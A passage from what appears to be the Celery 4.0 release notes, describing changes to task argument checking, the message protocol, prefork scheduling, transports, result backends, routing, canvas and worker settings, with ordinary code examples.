.. code-block:: python @app.task(bind=True, base=CustomTask) def custom(self): print('running') This change also means that the ``abstract`` attribute of the task no longer has any effect. .. _v400-typing: Task argument checking ---------------------- The arguments of the task are now verified when calling the task, even asynchronously: .. code-block:: pycon >>> @app.task ... def add(x, y): ... return x + y >>> add.delay(8, 8) >>> add.delay(8) Traceback (most recent call last): File "", line 1, in File "celery/app/task.py", line 376, in delay return self.apply_async(args, kwargs) File "celery/app/task.py", line 485, in apply_async check_arguments(*(args or ()), **(kwargs or {})) TypeError: add() takes exactly 2 arguments (1 given) You can disable the argument checking for any task by setting its :attr:`~@Task.typing` attribute to :const:`False`: .. code-block:: pycon >>> @app.task(typing=False) ... def add(x, y): ... return x + y Or if you would like to disable this completely for all tasks you can pass ``strict_typing=False`` when creating the app: .. code-block:: python app = Celery(..., strict_typing=False) Redis Events not backward compatible ------------------------------------ The Redis ``fanout_patterns`` and ``fanout_prefix`` transport options are now enabled by default. Workers/monitors without these flags enabled won't be able to see workers with this flag disabled. They can still execute tasks, but they cannot receive each others monitoring messages. You can upgrade in a backward compatible manner by first configuring your 3.1 workers and monitors to enable the settings, before the final upgrade to 4.0: .. code-block:: python BROKER_TRANSPORT_OPTIONS = { 'fanout_patterns': True, 'fanout_prefix': True, } Redis Priorities Reversed ------------------------- Priority 0 is now lowest, 9 is highest. This change was made to make priority support consistent with how it works in AMQP. Contributed by **Alex Koshelev**. Django: Auto-discover now supports Django app configurations ------------------------------------------------------------ The ``autodiscover_tasks()`` function can now be called without arguments, and the Django handler will automatically find your installed apps: .. code-block:: python app.autodiscover_tasks() The Django integration :ref:`example in the documentation ` has been updated to use the argument-less call. This also ensures compatibility with the new, ehm, ``AppConfig`` stuff introduced in recent Django versions. Worker direct queues no longer use auto-delete ---------------------------------------------- Workers/clients running 4.0 will no longer be able to send worker direct messages to workers running older versions, and vice versa. If you're relying on worker direct messages you should upgrade your 3.x workers and clients to use the new routing settings first, by replacing :func:`celery.utils.worker_direct` with this implementation: .. code-block:: python from kombu import Exchange, Queue worker_direct_exchange = Exchange('C.dq2') def worker_direct(hostname): return Queue( '{hostname}.dq2'.format(hostname), exchange=worker_direct_exchange, routing_key=hostname, ) This feature closed Issue #2492. Old command-line programs removed --------------------------------- Installing Celery will no longer install the ``celeryd``, ``celerybeat`` and ``celeryd-multi`` programs. This was announced with the release of Celery 3.1, but you may still have scripts pointing to the old names, so make sure you update these to use the new umbrella command: +-------------------+--------------+-------------------------------------+ | Program | New Status | Replacement | +===================+==============+=====================================+ | ``celeryd`` | **REMOVED** | :program:`celery worker` | +-------------------+--------------+-------------------------------------+ | ``celerybeat`` | **REMOVED** | :program:`celery beat` | +-------------------+--------------+-------------------------------------+ | ``celeryd-multi`` | **REMOVED** | :program:`celery multi` | +-------------------+--------------+-------------------------------------+ .. _v400-news: News ==== New protocol highlights ----------------------- The new protocol fixes many problems with the old one, and enables some long-requested features: - Most of the data are now sent as message headers, instead of being serialized with the message body. In version 1 of the protocol the worker always had to deserialize the message to be able to read task meta-data like the task id, name, etc. This also meant that the worker was forced to double-decode the data, first deserializing the message on receipt, serializing the message again to send to child process, then finally the child process deserializes the message again. Keeping the meta-data fields in the message headers means the worker doesn't actually have to decode the payload before delivering the task to the child process, and also that it's now possible for the worker to reroute a task written in a language different from Python to a different worker. - A new ``lang`` message header can be used to specify the programming language the task is written in. - Worker stores results for internal errors like ``ContentDisallowed``, and other deserialization errors. - Worker stores results and sends monitoring events for unregistered task errors. - Worker calls callbacks/errbacks even when the result is sent by the parent process (e.g., :exc:`WorkerLostError` when a child process terminates, deserialization errors, unregistered tasks). - A new ``origin`` header contains information about the process sending the task (worker node-name, or PID and host-name information). - A new ``shadow`` header allows you to modify the task name used in logs. This is useful for dispatch like patterns, like a task that calls any function using pickle (don't do this at home): .. code-block:: python from celery import Task from celery.utils.imports import qualname class call_as_task(Task): def shadow_name(self, args, kwargs, options): return 'call_as_task:{0}'.format(qualname(args[0])) def run(self, fun, *args, **kwargs): return fun(*args, **kwargs) call_as_task = app.register_task(call_as_task()) - New ``argsrepr`` and ``kwargsrepr`` fields contain textual representations of the task arguments (possibly truncated) for use in logs, monitors, etc. This means the worker doesn't have to deserialize the message payload to display the task arguments for informational purposes. - Chains now use a dedicated ``chain`` field enabling support for chains of thousands and more tasks. - New ``parent_id`` and ``root_id`` headers adds information about a tasks relationship with other tasks. - ``parent_id`` is the task id of the task that called this task - ``root_id`` is the first task in the work-flow. These fields can be used to improve monitors like flower to group related messages together (like chains, groups, chords, complete work-flows, etc). - ``app.TaskProducer`` replaced by :meth:`@amqp.create_task_message` and :meth:`@amqp.send_task_message`. Dividing the responsibilities into creating and sending means that people who want to send messages using a Python AMQP client directly, don't have to implement the protocol. The :meth:`@amqp.create_task_message` method calls either :meth:`@amqp.as_task_v2`, or :meth:`@amqp.as_task_v1` depending on the configured task protocol, and returns a special :class:`~celery.app.amqp.task_message` tuple containing the headers, properties and body of the task message. .. seealso:: The new task protocol is documented in full here: :ref:`message-protocol-task-v2`. Prefork Pool Improvements ------------------------- Tasks now log from the child process ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Logging of task success/failure now happens from the child process executing the task. As a result logging utilities, like Sentry can get full information about tasks, including variables in the traceback stack. ``-Ofair`` is now the default scheduling strategy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To re-enable the default behavior in 3.1 use the ``-Ofast`` command-line option. There's been lots of confusion about what the ``-Ofair`` command-line option does, and using the term "prefetch" in explanations have probably not helped given how confusing this terminology is in AMQP. When a Celery worker using the prefork pool receives a task, it needs to delegate that task to a child process for execution. The prefork pool has a configurable number of child processes (``--concurrency``) that can be used to execute tasks, and each child process uses pipes/sockets to communicate with the parent process: - inqueue (pipe/socket): parent sends task to the child process - outqueue (pipe/socket): child sends result/return value to the parent. In Celery 3.1 the default scheduling mechanism was simply to send the task to the first ``inqueue`` that was writable, with some heuristics to make sure we round-robin between them to ensure each child process would receive the same amount of tasks. This means that in the default scheduling strategy, a worker may send tasks to the same child process that is already executing a task. If that task is long running, it may block the waiting task for a long time. Even worse, hundreds of short-running tasks may be stuck behind a long running task even when there are child processes free to do work. The ``-Ofair`` scheduling strategy was added to avoid this situation, and when enabled it adds the rule that no task should be sent to the a child process that is already executing a task. The fair scheduling strategy may perform slightly worse if you have only short running tasks. Limit child process resident memory size ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. :sha:`5cae0e754128750a893524dcba4ae030c414de33` You can now limit the maximum amount of memory allocated per prefork pool child process by setting the worker :option:`--max-memory-per-child ` option, or the :setting:`worker_max_memory_per_child` setting. The limit is for RSS/resident memory size and is specified in kilobytes. A child process having exceeded the limit will be terminated and replaced with a new process after the currently executing task returns. See :ref:`worker-max-memory-per-child` for more information. Contributed by **Dave Smith**. One log-file per child process ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Init-scrips and :program:`celery multi` now uses the `%I` log file format option (e.g., :file:`/var/log/celery/%n%I.log`). This change was necessary to ensure each child process has a separate log file after moving task logging to the child process, as multiple processes writing to the same log file can cause corruption. You're encouraged to upgrade your init-scripts and :program:`celery multi` arguments to use this new option. Transports ---------- RabbitMQ priority queue support ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ See :ref:`routing-options-rabbitmq-priorities` for more information. Contributed by **Gerald Manipon**. Configure broker URL for read/write separately ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ New :setting:`broker_read_url` and :setting:`broker_write_url` settings have been added so that separate broker URLs can be provided for connections used for consuming/publishing. In addition to the configuration options, two new methods have been added the app API: - ``app.connection_for_read()`` - ``app.connection_for_write()`` These should now be used in place of ``app.connection()`` to specify the intent of the required connection. .. note:: Two connection pools are available: ``app.pool`` (read), and ``app.producer_pool`` (write). The latter doesn't actually give connections but full :class:`kombu.Producer` instances. .. code-block:: python def publish_some_message(app, producer=None): with app.producer_or_acquire(producer) as producer: ... def consume_messages(app, connection=None): with app.connection_or_acquire(connection) as connection: ... RabbitMQ queue extensions support ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Queue declarations can now set a message TTL and queue expiry time directly, by using the ``message_ttl`` and ``expires`` arguments New arguments have been added to :class:`~kombu.Queue` that lets you directly and conveniently configure RabbitMQ queue extensions in queue declarations: - ``Queue(expires=20.0)`` Set queue expiry time in float seconds. See :attr:`kombu.Queue.expires`. - ``Queue(message_ttl=30.0)`` Set queue message time-to-live float seconds. See :attr:`kombu.Queue.message_ttl`. - ``Queue(max_length=1000)`` Set queue max length (number of messages) as int. See :attr:`kombu.Queue.max_length`. - ``Queue(max_length_bytes=1000)`` Set queue max length (message size total in bytes) as int. See :attr:`kombu.Queue.max_length_bytes`. - ``Queue(max_priority=10)`` Declare queue to be a priority queue that routes messages based on the ``priority`` field of the message. See :attr:`kombu.Queue.max_priority`. Amazon SQS transport now officially supported ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The SQS broker transport has been rewritten to use async I/O and as such joins RabbitMQ, Redis and QPid as officially supported transports. The new implementation also takes advantage of long polling, and closes several issues related to using SQS as a broker. This work was sponsored by Nextdoor. Apache QPid transport now officially supported ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by **Brian Bouterse**. Redis: Support for Sentinel --------------------------- You can point the connection to a list of sentinel URLs like: .. code-block:: text sentinel://0.0.0.0:26379;sentinel://0.0.0.0:26380/... where each sentinel is separated by a `;`. Multiple sentinels are handled by :class:`kombu.Connection` constructor, and placed in the alternative list of servers to connect to in case of connection failure. Contributed by **Sergey Azovskov**, and **Lorenzo Mancini**. Tasks ----- Task Auto-retry Decorator ~~~~~~~~~~~~~~~~~~~~~~~~~ Writing custom retry handling for exception events is so common that we now have built-in support for it. For this a new ``autoretry_for`` argument is now supported by the task decorators, where you can specify a tuple of exceptions to automatically retry for: .. code-block:: python from twitter.exceptions import FailWhaleError @app.task(autoretry_for=(FailWhaleError,)) def refresh_timeline(user): return twitter.refresh_timeline(user) See :ref:`task-autoretry` for more information. Contributed by **Dmitry Malinovsky**. .. :sha:`75246714dd11e6c463b9dc67f4311690643bff24` ``Task.replace`` Improvements ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - ``self.replace(signature)`` can now replace any task, chord or group, and the signature to replace with can be a chord, group or any other type of signature. - No longer inherits the callbacks and errbacks of the existing task. If you replace a node in a tree, then you wouldn't expect the new node to inherit the children of the old node. - ``Task.replace_in_chord`` has been removed, use ``.replace`` instead. - If the replacement is a group, that group will be automatically converted to a chord, where the callback "accumulates" the results of the group tasks. A new built-in task (`celery.accumulate` was added for this purpose) Contributed by **Steeve Morin**, and **Ask Solem**. Remote Task Tracebacks ~~~~~~~~~~~~~~~~~~~~~~ The new :setting:`task_remote_tracebacks` will make task tracebacks more useful by injecting the stack of the remote worker. This feature requires the additional :pypi:`tblib` library. Contributed by **Ionel Cristian Mărieș**. Handling task connection errors ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Connection related errors occurring while sending a task is now re-raised as a :exc:`kombu.exceptions.OperationalError` error: .. code-block:: pycon >>> try: ... add.delay(2, 2) ... except add.OperationalError as exc: ... print('Could not send task %r: %r' % (add, exc)) See :ref:`calling-connection-errors` for more information. Gevent/Eventlet: Dedicated thread for consuming results ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ When using :pypi:`gevent`, or :pypi:`eventlet` there is now a single thread responsible for consuming events. This means that if you have many calls retrieving results, there will be a dedicated thread for consuming them: .. code-block:: python result = add.delay(2, 2) # this call will delegate to the result consumer thread: # once the consumer thread has received the result this greenlet can # continue. value = result.get(timeout=3) This makes performing RPC calls when using gevent/eventlet perform much better. ``AsyncResult.then(on_success, on_error)`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The AsyncResult API has been extended to support the :class:`~vine.promise` protocol. This currently only works with the RPC (amqp) and Redis result backends, but lets you attach callbacks to when tasks finish: .. code-block:: python import gevent.monkey monkey.patch_all() import time from celery import Celery app = Celery(broker='amqp://', backend='rpc') @app.task def add(x, y): return x + y def on_result_ready(result): print('Received result for id %r: %r' % (result.id, result.result,)) add.delay(2, 2).then(on_result_ready) time.sleep(3) # run gevent event loop for a while. Demonstrated using :pypi:`gevent` here, but really this is an API that's more useful in callback-based event loops like :pypi:`twisted`, or :pypi:`tornado`. New Task Router API ~~~~~~~~~~~~~~~~~~~ The :setting:`task_routes` setting can now hold functions, and map routes now support glob patterns and regexes. Instead of using router classes you can now simply define a function: .. code-block:: python def route_for_task(name, args, kwargs, options, task=None, **kwargs): from proj import tasks if name == tasks.add.name: return {'queue': 'hipri'} If you don't need the arguments you can use start arguments, just make sure you always also accept star arguments so that we have the ability to add more features in the future: .. code-block:: python def route_for_task(name, *args, **kwargs): from proj import tasks if name == tasks.add.name: return {'queue': 'hipri', 'priority': 9} Both the ``options`` argument and the new ``task`` keyword argument are new to the function-style routers, and will make it easier to write routers based on execution options, or properties of the task. The optional ``task`` keyword argument won't be set if a task is called by name using :meth:`@send_task`. For more examples, including using glob/regexes in routers please see :setting:`task_routes` and :ref:`routing-automatic`. Canvas Refactor ~~~~~~~~~~~~~~~ The canvas/work-flow implementation have been heavily refactored to fix some long outstanding issues. .. :sha:`d79dcd8e82c5e41f39abd07ffed81ca58052bcd2` .. :sha:`1e9dd26592eb2b93f1cb16deb771cfc65ab79612` .. :sha:`e442df61b2ff1fe855881c1e2ff9acc970090f54` .. :sha:`0673da5c09ac22bdd49ba811c470b73a036ee776` - Error callbacks can now take real exception and traceback instances (Issue #2538). .. code-block:: pycon >>> add.s(2, 2).on_error(log_error.s()).delay() Where ``log_error`` could be defined as: .. code-block:: python @app.task def log_error(request, exc, traceback): with open(os.path.join('/var/errors', request.id), 'a') as fh: print('--\n\n{0} {1} {2}'.format( task_id, exc, traceback), file=fh) See :ref:`guide-canvas` for more examples. - ``chain(a, b, c)`` now works the same as ``a | b | c``. This means chain may no longer return an instance of ``chain``, instead it may optimize the workflow so that e.g. two groups chained together becomes one group. - Now unrolls groups within groups into a single group (Issue #1509). - chunks/map/starmap tasks now routes based on the target task - chords and chains can now be immutable. - Fixed bug where serialized signatures weren't converted back into signatures (Issue #2078) Fix contributed by **Ross Deane**. - Fixed problem where chains and groups didn't work when using JSON serialization (Issue #2076). Fix contributed by **Ross Deane**. - Creating a chord no longer results in multiple values for keyword argument 'task_id' (Issue #2225). Fix contributed by **Aneil Mallavarapu**. - Fixed issue where the wrong result is returned when a chain contains a chord as the penultimate task. Fix contributed by **Aneil Mallavarapu**. - Special case of ``group(A.s() | group(B.s() | C.s()))`` now works. - Chain: Fixed bug with incorrect id set when a subtask is also a chain. - ``group | group`` is now flattened into a single group (Issue #2573). - Fixed issue where ``group | task`` wasn't upgrading correctly to chord (Issue #2922). - Chords now properly sets ``result.parent`` links. - ``chunks``/``map``/``starmap`` are now routed based on the target task. - ``Signature.link`` now works when argument is scalar (not a list) (Issue #2019). - ``group()`` now properly forwards keyword arguments (Issue #3426). Fix contributed by **Samuel Giffard**. - A ``chord`` where the header group only consists of a single task is now turned into a simple chain. - Passing a ``link`` argument to ``group.apply_async()`` now raises an error (Issue #3508). - ``chord | sig`` now attaches to the chord callback (Issue #3356). Periodic Tasks -------------- New API for configuring periodic tasks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This new API enables you to use signatures when defining periodic tasks, removing the chance of mistyping task names. An example of the new API is :ref:`here `. .. :sha:`bc18d0859c1570f5eb59f5a969d1d32c63af764b` .. :sha:`132d8d94d38f4050db876f56a841d5a5e487b25b` Optimized Beat implementation ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The :program:`celery beat` implementation has been optimized for millions of periodic tasks by using a heap to schedule entries. Contributed by **Ask Solem** and **Alexander Koshelev**. Schedule tasks based on sunrise, sunset, dawn and dusk ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ See :ref:`beat-solar` for more information. Contributed by **Mark Parncutt**. Result Backends --------------- RPC Result Backend matured ~~~~~~~~~~~~~~~~~~~~~~~~~~ Lots of bugs in the previously experimental RPC result backend have been fixed and can now be considered to production use. Contributed by **Ask Solem**, **Morris Tweed**. Redis: Result backend optimizations ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ``result.get()`` is now using pub/sub for streaming task results ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Calling ``result.get()`` when using the Redis result backend used to be extremely expensive as it was using polling to wait for the result to become available. A default polling interval of 0.5 seconds didn't help performance, but was necessary to avoid a spin loop. The new implementation is using Redis Pub/Sub mechanisms to publish and retrieve results immediately, greatly improving task round-trip times. Contributed by **Yaroslav Zhavoronkov** and **Ask Solem**. New optimized chord join implementation ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ This was an experimental feature introduced in Celery 3.1, that could only be enabled by adding ``?new_join=1`` to the result backend URL configuration. We feel that the implementation has been tested thoroughly enough to be considered stable and enabled by default. The new implementation greatly reduces the overhead of chords, and especially with larger chords the performance benefit can be massive. New Riak result backend introduced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ See :ref:`conf-riak-result-backend` for more information. Contributed by **Gilles Dartiguelongue**, **Alman One** and **NoKriK**. New CouchDB result backend introduced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ See :ref:`conf-couchdb-result-backend` for more information. Contributed by **Nathan Van Gheem**. New Consul result backend introduced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Add support for Consul as a backend using the Key/Value store of Consul. Consul has an HTTP API where through you can store keys with their values. The backend extends KeyValueStoreBackend and implements most of the methods. Mainly to set, get and remove objects. This allows Celery to store Task results in the K/V store of Consul. Consul also allows to set a TTL on keys using the Sessions from Consul. This way the backend supports auto expiry of Task results. For more information on Consul visit https://consul.io/ The backend uses :pypi:`python-consul` for talking to the HTTP API. This package is fully Python 3 compliant just as this backend is: .. code-block:: console $ pip install python-consul That installs the required package to talk to Consul's HTTP API from Python. You can also specify consul as an extension in your dependency on Celery: .. code-block:: console $ pip install celery[consul] See :ref:`bundles` for more information. Contributed by **Wido den Hollander**. Brand new Cassandra result backend ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A brand new Cassandra backend utilizing the new :pypi:`cassandra-driver` library is replacing the old result backend using the older :pypi:`pycassa` library. See :ref:`conf-cassandra-result-backend` for more information. To depend on Celery with Cassandra as the result backend use: .. code-block:: console $ pip install celery[cassandra] You can also combine multiple extension requirements, please see :ref:`bundles` for more information. .. # XXX What changed? New Elasticsearch result backend introduced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ See :ref:`conf-elasticsearch-result-backend` for more information. To depend on Celery with Elasticsearch as the result bakend use: .. code-block:: console $ pip install celery[elasticsearch] You can also combine multiple extension requirements, please see :ref:`bundles` for more information. Contributed by **Ahmet Demir**. New File-system result backend introduced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ See :ref:`conf-filesystem-result-backend` for more information. Contributed by **Môshe van der Sterre**. Event Batching -------------- Events are now buffered in the worker and sent as a list, reducing the overhead required to send monitoring events. For authors of custom event monitors there will be no action required as long as you're using the Python Celery helpers (:class:`~@events.Receiver`) to implement your monitor. However, if you're parsing raw event messages you must now account for batched event messages, as they differ from normal event messages in the following way: - The routing key for a batch of event messages will be set to ``.multi`` where the only batched event group is currently ``task`` (giving a routing key of ``task.multi``). - The message body will be a serialized list-of-dictionaries instead of a dictionary. Each item in the list can be regarded as a normal event message body. .. :sha:`03399b4d7c26fb593e61acf34f111b66b340ba4e` In Other News... ---------------- Requirements ~~~~~~~~~~~~ - Now depends on :ref:`Kombu 4.0 `. - Now depends on :pypi:`billiard` version 3.5. - No longer depends on :pypi:`anyjson`. Good-bye old friend :( Tasks ~~~~~ - The "anon-exchange" is now used for simple name-name direct routing. This increases performance as it completely bypasses the routing table, in addition it also improves reliability for the Redis broker transport. - An empty ResultSet now evaluates to True. Fix contributed by **Colin McIntosh**. - The default routing key (:setting:`task_default_routing_key`) and exchange name (:setting:`task_default_exchange`) is now taken from the :setting:`task_default_queue` setting. This means that to change the name of the default queue, you now only have to set a single setting. - New :setting:`task_reject_on_worker_lost` setting, and :attr:`~@Task.reject_on_worker_lost` task attribute decides what happens when the child worker process executing a late ack task is terminated. Contributed by **Michael Permana**. - ``Task.subtask`` renamed to ``Task.signature`` with alias. - ``Task.subtask_from_request`` renamed to ``Task.signature_from_request`` with alias. - The ``delivery_mode`` attribute for :class:`kombu.Queue` is now respected (Issue #1953). - Routes in :setting:`task-routes` can now specify a :class:`~kombu.Queue` instance directly. Example: .. code-block:: python task_routes = {'proj.tasks.add': {'queue': Queue('add')}} - ``AsyncResult`` now raises :exc:`ValueError` if task_id is None. (Issue #1996). - Retried tasks didn't forward expires setting (Issue #3297). - ``result.get()`` now supports an ``on_message`` argument to set a callback to be called for every message received. - New abstract classes added: - :class:`~celery.utils.abstract.CallableTask` Looks like a task. - :class:`~celery.utils.abstract.CallableSignature` Looks like a task signature. - ``Task.replace`` now properly forwards callbacks (Issue #2722). Fix contributed by **Nicolas Unravel**. - ``Task.replace``: Append to chain/chord (Closes #3232) Fixed issue #3232, adding the signature to the chain (if there's any). Fixed the chord suppress if the given signature contains one. Fix contributed by :github_user:`honux`. - Task retry now also throws in eager mode. Fix contributed by **Feanil Patel**. Beat ~~~~ - Fixed crontab infinite loop with invalid date. When occurrence can never be reached (example, April, 31th), trying to reach the next occurrence would trigger an infinite loop. Try fixing that by raising a :exc:`RuntimeError` after 2,000 iterations (Also added a test for crontab leap years in the process) Fix contributed by **Romuald Brunet**. - Now ensures the program exits with a non-zero exit code when an exception terminates the service. Fix contributed by **Simon Peeters**. App ~~~ - Dates are now always timezone aware even if :setting:`enable_utc` is disabled (Issue #943). Fix contributed by **Omer Katz**. - **Config**: App preconfiguration is now also pickled with the configuration. Fix contributed by **Jeremy Zafran**. - The application can now change how task names are generated using the :meth:`~@gen_task_name` method. Contributed by **Dmitry Malinovsky**. - App has new ``app.current_worker_task`` property that returns the task that's currently being worked on (or :const:`None`). (Issue #2100). Logging ~~~~~~~ - :func:`~celery.utils.log.get_task_logger` now raises an exception if trying to use the name "celery" or "celery.task" (Issue #3475). Execution Pools ~~~~~~~~~~~~~~~ - **Eventlet/Gevent**: now enables AMQP heartbeat (Issue #3338). - **Eventlet/Gevent**: Fixed race condition leading to "simultaneous read" errors (Issue #2755). - **Prefork**: Prefork pool now uses ``poll`` instead of ``select`` where available (Issue #2373). - **Prefork**: Fixed bug where the pool would refuse to shut down the worker (Issue #2606). - **Eventlet**: Now returns pool size in :program:`celery inspect stats` command. Contributed by **Alexander Oblovatniy**. Testing ------- - Celery is now a :pypi:`pytest` plugin, including fixtures useful for unit and integration testing. See the :ref:`testing user guide ` for more information. Transports ~~~~~~~~~~ - ``amqps://`` can now be specified to require SSL. - **Redis Transport**: The Redis transport now supports the :setting:`broker_use_ssl` option. Contributed by **Robert Kolba**. - JSON serializer now calls ``obj.__json__`` for unsupported types. This means you can now define a ``__json__`` method for custom types that can be reduced down to a built-in json type. Example: .. code-block:: python class Person: first_name = None last_name = None address = None def __json__(self): return { 'first_name': self.first_name, 'last_name': self.last_name, 'address': self.address, } - JSON serializer now handles datetime's, Django promise, UUID and Decimal. - New ``Queue.consumer_arguments`` can be used for the ability to set consumer priority via ``x-priority``. See https://www.rabbitmq.com/consumer-priority.html Example: .. code-block:: python consumer = Consumer(channel, consumer_arguments={'x-priority': 3}) - Queue/Exchange: ``no_declare`` option added (also enabled for internal amq. exchanges). Programs ~~~~~~~~ - Celery is now using :mod:`argparse`, instead of :mod:`optparse`. - All programs now disable colors if the controlling terminal is not a TTY. - :program:`celery worker`: The ``-q`` argument now disables the startup banner. - :program:`celery worker`: The "worker ready" message is now logged using severity info, instead of warn. - :program:`celery multi`: ``%n`` format for is now synonym with ``%N`` to be consistent with :program:`celery worker`. - :program:`celery inspect`/:program:`celery control`: now supports a new :option:`--json ` option to give output in json format. - :program:`celery inspect registered`: now ignores built-in tasks. - :program:`celery purge` now takes ``-Q`` and ``-X`` options used to specify what queues to include and exclude from the purge. - New :program:`celery logtool`: Utility for filtering and parsing celery worker log-files - :program:`celery multi`: now passes through `%i` and `%I` log file formats. - General: ``%p`` can now be used to expand to the full worker node-name in log-file/pid-file arguments. - A new command line option :option:`--executable ` is now available for daemonizing programs (:program:`celery worker` and :program:`celery beat`). Contributed by **Bert Vanderbauwhede**. - :program:`celery worker`: supports new :option:`--prefetch-multiplier ` option. Contributed by **Mickaël Penhard**. - The ``--loader`` argument is now always effective even if an app argument is set (Issue #3405). - inspect/control now takes commands from registry This means user remote-control commands can also be used from the command-line. Note that you need to specify the arguments/and type of arguments for the arguments to be correctly passed on the command-line. There are now two decorators, which use depends on the type of command: `@inspect_command` + `@control_command`: .. code-block:: python from celery.worker.control import control_command @control_command( args=[('n', int)] signature='[N=1]', ) def something(state, n=1, **kwargs): ... Here ``args`` is a list of args supported by the command. The list must contain tuples of ``(argument_name, type)``. ``signature`` is just the command-line help used in e.g. ``celery -A proj control --help``. Commands also support `variadic` arguments, which means that any arguments left over will be added to a single variable. Here demonstrated by the ``terminate`` command which takes a signal argument and a variable number of task_ids: .. code-block:: python from celery.worker.control import control_command @control_command( args=[('signal', str)], signature=' [id1, [id2, [..., [idN]]]]', variadic='ids', ) def terminate(state, signal, ids, **kwargs): ... This command can now be called using: .. code-block:: console $ celery -A proj control terminate SIGKILL id1 id2 id3` See :ref:`worker-custom-control-commands` for more information. Worker ~~~~~~ - Improvements and fixes for :class:`~celery.utils.collections.LimitedSet`. Getting rid of leaking memory + adding ``minlen`` size of the set: the minimal residual size of the set after operating for some time. ``minlen`` items are kept, even if they should've been expired. Problems with older and even more old code: #. Heap would tend to grow in some scenarios (like adding an item multiple times). #. Adding many items fast wouldn't clean them soon enough (if ever). #. When talking to other workers, revoked._data was sent, but it was processed on the other side as iterable. That means giving those keys new (current) time-stamp. By doing this workers could recycle items forever. Combined with 1) and 2), this means that in large set of workers, you're getting out of memory soon. All those problems should be fixed now. This should fix issues #3095, #3086. Contributed by **David Pravec**. - New settings to control remote control command queues. - :setting:`control_queue_expires` Set queue expiry time for both remote control command queues, and remote control reply queues. - :setting:`control_queue_ttl` Set message time-to-live for both remote control command queues, and remote control reply queues. Contributed by **Alan Justino**. - The :signal:`worker_shutdown` signal is now always called during shutdown. Previously it would not be called if the worker instance was collected by gc first. - Worker now only starts the remote control command consumer if the broker transport used actually supports them. - Gossip now sets ``x-message-ttl`` for event queue to heartbeat_interval s. (Issue #2005). - Now preserves exit code (Issue #2024). - Now rejects messages with an invalid ETA value (instead of ack, which means they will be sent to the dead-letter exchange if one is configured). - Fixed crash when the ``-purge`` argument was used. - Log--level for unrecoverable errors changed from ``error`` to ``critical``. - Improved rate limiting accuracy. - Account for missing timezone information in task expires field. Fix contributed by **Albert Wang**. - The worker no longer has a ``Queues`` bootsteps, as it is now superfluous. - Now emits the "Received task" line even for revoked tasks. (Issue #3155). - Now respects :setting:`broker_connection_retry` setting. Fix contributed by **Nat Williams**. - New :setting:`control_queue_ttl` and :setting:`control_queue_expires` settings now enables you to configure remote control command message TTLs, and queue expiry time. Contributed by **Alan Justino**. - New :data:`celery.worker.state.requests` enables O(1) loookup of active/reserved tasks by id. - Auto-scale didn't always update keep-alive when scaling down. Fix contributed by **Philip Garnero**. - Fixed typo ``options_list`` -> ``option_list``. Fix contributed by **Greg Wilbur**. - Some worker command-line arguments and ``Worker()`` class arguments have been renamed for consistency. All of these have aliases for backward compatibility. - ``--send-events`` -> ``--task-events`` - ``--schedule`` -> ``--schedule-filename`` - ``--maxtasksperchild`` -> ``--max-tasks-per-child`` - ``Beat(scheduler_cls=)`` -> ``Beat(scheduler=)`` - ``Worker(send_events=True)`` -> ``Worker(task_events=True)`` - ``Worker(task_time_limit=)`` -> ``Worker(time_limit=``) - ``Worker(task_soft_time_limit=)`` -> ``Worker(soft_time_limit=)`` - ``Worker(state_db=)`` -> ``Worker(statedb=)`` - ``Worker(working_directory=)`` -> ``Worker(workdir=)`` Debugging Utilities ~~~~~~~~~~~~~~~~~~~ - :mod:`celery.contrib.rdb`: Changed remote debugger banner so that you can copy and paste the address easily (no longer has a period in the address). Contributed by **Jonathan Vanasco**. - Fixed compatibility with recent :pypi:`psutil` versions (Issue #3262). Signals ~~~~~~~ - **App**: New signals for app configuration/finalization: - :data:`app.on_configure <@on_configure>` - :data:`app.on_after_configure <@on_after_configure>` - :data:`app.on_after_finalize <@on_after_finalize>` - **Task**: New task signals for rejected task messages: - :data:`celery.signals.task_rejected`. - :data:`celery.signals.task_unknown`. - **Worker**: New signal for when a heartbeat event is sent. - :data:`celery.signals.heartbeat_sent` Contributed by **Kevin Richardson**. Events ~~~~~~ - Event messages now uses the RabbitMQ ``x-message-ttl`` option to ensure older event messages are discarded. The default is 5 seconds, but can be changed using the :setting:`event_queue_ttl` setting. - ``Task.send_event`` now automatically retries sending the event on connection failure, according to the task publish retry settings. - Event monitors now sets the :setting:`event_queue_expires` setting by default. The queues will now expire after 60 seconds after the monitor stops consuming from it. - Fixed a bug where a None value wasn't handled properly. Fix contributed by **Dongweiming**. - New :setting:`event_queue_prefix` setting can now be used to change the default ``celeryev`` queue prefix for event receiver queues. Contributed by **Takeshi 